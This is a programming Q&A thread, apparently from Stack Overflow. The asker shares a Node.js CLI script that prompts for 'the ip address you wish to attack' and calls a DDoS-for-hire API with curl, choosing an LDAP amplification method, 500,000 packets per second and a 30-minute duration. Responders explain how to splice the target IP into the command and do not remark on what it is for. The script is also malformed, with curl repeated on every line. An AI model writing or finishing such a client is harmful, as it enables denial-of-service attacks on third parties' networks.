# Adding a variable into a curl command

Tags: javascript

```
  var readline = require('readline');
 var exec = require('child_process').exec,
  child;
  var rl = readline.createInterface({
    input: process.stdin,
    output: process.stdout
   });
   rl.question('What is the ip address you wish to attack?', (answer) 
    => 
    {
  const concatenation = 'Attacking ' + answer;
    child = exec('curl https://api.wifi.rip/v1/attacks/launch  \
        curl -X POST \
        curl -d token="" \
        curl -d target= \
        curl -d port=80 \
        curl -d duration=1800 \
        curl -d method="LDAP" \
        curl -d pps=500000 \
        curl -v');
        console.log(concatenation);

    child.stdout.pipe(process.stdout);
    rl.close();
    });
```

I need to put "answer" into curl -d target= for my CLI client. I have researched this for hours and couldn't figure it out.

Comment: concatenation in js is `+`, like `curl -d target=' + answer + '`

Comment: or you can use template literals place all the curl command in ``` instead of `"` or `'` then at the particular location where you want the variable to be just do this ${answer}

Comment: Thank you so much. I knew it was a simple fix, I just couldn't figure it out.

Answer (score 0):

Have you tried string concatenation, since you're just passing a string with the curl command into exec?

```
var answer = "the answer";
console.log("This is " + answer); // Prints "This is the answer"
```

For your example, you could do something like:

```
exec('curl https://url.com \
    ...
    curl -d target=' + answer + ' \
    curl ...')
```

Answer (score 0):

```
 concatenation in js is +, like curl -d target=' + answer + '
```

Thanks everyone for help. This worked